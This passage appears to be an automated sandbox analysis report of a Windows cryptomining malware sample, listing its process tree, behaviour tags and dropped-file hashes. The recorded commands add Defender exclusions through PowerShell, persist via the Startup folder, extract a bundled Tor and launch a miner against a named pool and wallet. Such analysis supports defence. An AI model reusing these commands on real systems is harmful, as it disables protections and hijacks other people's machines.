- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe"C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTCPIP6Driver.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\SetupTCPIP6Driver.exe"C:\Windows\System32\SetupTCPIP6Driver.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=SetupTCPIP6Driver.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.03⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe775c46f8,0x7ffe775c4708,0x7ffe775c47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:34⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4296 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,9534570256288596198,12875074200840190130,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=SetupTCPIP6Driver.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.03⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe775c46f8,0x7ffe775c4708,0x7ffe775c47184⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTcpipDriver.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\SetupTcpipDriver.exe"C:\Windows\System32\SetupTcpipDriver.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Runs regedit.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck635442⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\attrib.exe-a rx/0 -o stratum+ssl://auto.c3pool.org:33333 -u 88stqbdHnfya436DJkUvtGfW8tiWNMv6aQFB5cpK7zY2P9G6D5CaM9VfzZmNfaZweXeuhnGZjcqrPJrTXEmvFxttLezJvkm.6B6CDD0E -p x -t 43⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck635442⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck635442⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck635442⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestampFilesize
46B
MD5682435e8450e601ea6671fe57fc8ac68
SHA1404438a9f109e9667c0ec216131edf0cd520726e
SHA256a9b4a90db5d1ac3ce6177038e6eae7313d02669bea7d48cf51bd53fca0a2402e
SHA512b6c9a3a994934e2d10ace6c4e1e233af1aadbbfc68631719ff546fddc5fc3a3824a95609ee4390b8c6560d29472511f2204199f19299c05d9b1f4f9bfcc4a5c9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a774512b00820b61a51258335097b2c9
SHA138c28d1ea3907a1af6c0443255ab610dd9285095
SHA25601946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4
SHA512ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5fd7944a4ff1be37517983ffaf5700b11
SHA1c4287796d78e00969af85b7e16a2d04230961240
SHA256b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74
SHA51228c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
264B
MD5518371e53352a4b19fb1082635443cbc
SHA183062e666365208b2c8eed9b1ef9d59e383983d1
SHA25664a8d94610c0a747b3beaa4f1f9648f3b808766344f1007a8a0d57d819f42406
SHA512cd060d656ed4e9bc0d532c60ad22d1d09290d49fc1ec10c060cab5830738b8afa85d5446d5f4d1319e16e0bcbc7a6d44362c8039a9d5d645a95a2b51759cab86
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
437B
MD505592d6b429a6209d372dba7629ce97c
SHA1b4d45e956e3ec9651d4e1e045b887c7ccbdde326
SHA2563aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd
SHA512caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD52131830433cc6d4e08e8a9d72dae17ad
SHA18e8425f329389444bdd3bde05bd899eed4d9f0f7
SHA25617edffeab4dac6e36e7ff1267637d94426401eb93d2fd2e0ff920ab3b9aacff1
SHA51230aa09b5a22f05b00b5ea4f0bbf07c324593c8fe6d7ab8751daede590c943c1dee9bf68c30ab7118b6eacaee5cdbb27e7bb411634a96049c312a3bafa507253a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD554b2abb99771c47f13db718f3e34c1ff
SHA1d1f6b8ed9894c2bf1f2f4f542e90ce574bce5b2e
SHA2564c78a19f689d00d6c15119f12cbbd1c71b81caa5e4f27baed975b72283bdceb2
SHA51284d52277183b7e86c4e2f0ce938c8b746978239523449c7f17e533332816b9301de9e01e86bafe31c5e9c41619b75f4119ddd54434c6a766bba731ea1fa44a83
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
371B
MD53068a9ca0c3d4b448bb50e46f5c601f2
SHA1e266835fa8baafbe950167451b92dff4d01c1087
SHA256a8e0e8e9f6bd187486494f4791e5562b1a02524baed5f7986d06fe278da5d50f
SHA51282e03d163eab7b323b9a704300c1acd42a0dec0ad59d6313879c64a4af12b35f33176cae55071f420b7c072add4d7e94e41bab4ce7b509608e6672862f4835b7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585399.TMPFilesize
371B
MD5ecd9747e02ada7a37952afdf7518a370
SHA1790cf9e13e209b4607208ada7be7b378554c37c3
SHA25687c39f9c09b6a4a53975a41f6e01b0831e1259d6e16a69070ae7a1f95c108e9f
SHA512c2490eb0bd9c86247dbcea852969ce8178999549ce2d5c87148629d614935b75434a3e1d10644db0d439a1cbf4fcb1493bcc1233e87bc166077f207a6f938572
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD564a9114f321df385f2f70d2c0b278f0d
SHA12181b7f0bf86dca423fe80401a265c291ac21b4f
SHA25658ae7c378ab3549618c74e99fe235a428c4ed7b26a42946b6b7c2a3c572703bb
SHA51236b94c701c755371fc8797932ebd62bb133d678bffdc3c716d8efff03ca1c2f2f2ace4485b0c674d95781250656198d252a528cda9c441d8b9235c50628648c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5f7144e5784d14ec099093aa1abd6e679
SHA190066c433de52aba933fddeb9e03af5d4fe98bcc
SHA256dd4991cb51dcd825eedcceb94a9989ede83772cb177132e0dce8917017c18bab
SHA512cbce69dddce8782345ee8f405d4d8974b49fc974f5bcf96a55e0abc534b00a6273d2399bfe0bd70143d2e366d0c57bebc0ab05d69a61290515c035407b11f83c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52524e72b0573fa94e9cb8089728a4b47
SHA13d5c4dfd6e7632153e687ee866f8ecc70730a0f1
SHA256fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747
SHA51299a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59bc110200117a3752313ca2acaf8a9e1
SHA1fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA5121f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
-
C:\Users\Admin\AppData\Local\Temp\32.exeFilesize
2.6MB
MD5227471ea56e880a094c017890b4194d5
SHA1933a99874735a88bbde02553255962f310d5548f
SHA2565fe60c59c47b8c62719a8f2a7c270817448e669e27ecf0a7398218e4b40e6fff
